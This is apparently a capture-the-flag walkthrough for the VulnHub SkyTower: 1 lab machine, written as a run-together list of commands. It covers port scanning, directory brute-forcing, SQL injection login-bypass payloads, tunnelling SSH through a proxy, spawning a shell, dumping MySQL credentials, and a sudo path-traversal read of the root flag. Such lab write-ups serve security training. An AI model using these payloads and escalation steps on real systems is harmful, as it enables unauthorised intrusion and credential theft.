VulnHub: SkyTower: 1

nmap -sn 10.0.2.27/24
nmap -Pn 10.0.2.40nmap -Pn -p1000- 10.0.2.40
nmap -A -p22,80,3128 10.0.2.40
nmap --script vuln -p22,80,3128 10.0.2.40
ssh 10.0.2.40
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.40/ -x php,txt,html,sh,cgi,bak -q
test@test.comtest
1' or 1=1--
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 
1' || 1=1--
1' || 1=1-- - -> failed1' || 1=1--+ -> failed1' || 1=1# -> succeeded
proxytunnel -p <target ip>:<proxy port> -d 127.0.0.1:<target port> -a <our port>proxytunnel -p 10.0.2.40:3128 -d 127.0.0.1:22 -a 1234
ssh john@127.0.0.1 -p 1234
ssh john@127.0.0.1 -p 1234 '() { :;}; /bin/bash'
ssh john@127.0.0.1 -p 1234 /bin/bashid
python -c 'import pty;pty.spawn("/bin/bash");'
which echoecho os.system('/bin/bash')
ls -la
nano .bashrc
cat .bashrc
rm .bashrc
ssh john@127.0.0.1 -p 1234
cat /etc/passwd
/opt/tmp/var/var/backups/var/log/var/mail/var/www/html
cd /var/www/htmlls -lacat login.php
sudo -l
mysql -V
mysql -uroot -proot
use mysql;show databases;
use SkyTech;show tables;
select * from login
su sara
ssh sara@127.0.0.1 -p 1234 /bin/bashrm .bashrc
ssh sara@127.0.0.1 -p 1234
sudo -l
ls -la /
sudo /bin/cat /accounts/../root/flag.txt
su -password: theskytower

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store